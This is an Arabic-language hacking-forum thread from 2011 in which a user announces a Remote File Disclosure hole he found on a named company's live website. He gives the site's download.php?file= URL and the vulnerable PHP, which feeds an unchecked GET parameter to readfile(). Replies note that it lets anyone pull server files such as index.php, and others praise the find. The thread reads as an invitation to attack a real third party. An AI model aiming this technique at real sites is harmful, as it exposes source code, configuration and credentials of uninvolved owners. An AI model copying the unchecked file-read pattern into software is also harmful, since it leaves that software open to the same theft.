:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   {10} >Remote File Disclosure تطبيق <{10} (http://www.vbspiders.com/vb/t57984.html)

ZrIqE ViRuS 08-18-2011 03:29 PM

{10} >Remote File Disclosure تطبيق <{10}
 
السلام عليكم

اليوم كنت بلف شويه بالمواقع فلقيت هالثغره

http://tuffdocksystems.com/download....e=download.php

طبعا هاد تطبيق ع الثغره والي يشوفها يقرا الكود البرمجي الي مطبق للثغره

للمزيد حول الثغره تم شرحه بالدوره من هنا


http://www.vbspiders.com/vb/t32090.html

اتمنا تكون هاي الثغره وضحت الان اكثر
وهذا كود الثغره

كود PHP:


<?
$file 
$_GET['file'];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>

موفقين :surrender:

bleu moon 08-18-2011 03:31 PM

يعطيك الخير حبيبي فولكانو والله ..~
الكود البرمجي بسيط وتقدر انك تحمل الملفات زي index.php ..~
الخ ..
ماشفت اي واحد زيك ! اكتشفتها وبعد 4 دقايق وضعتها في المنتدى ..~
يعطيك الخير كثير كثير كثير !!!

k4$p3r-MA 08-18-2011 03:33 PM

مشكورر اخي ما شاء الله عليك ثغرة جميلة :)

Antivirus7 08-18-2011 05:23 PM

وعليــكم السلآم و رحمة الله
الله عليــك يآعبدوآ مبدع من يوم عرفتك
لآ تحرمنآ من موآضيعك


الساعة الآن 12:30 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0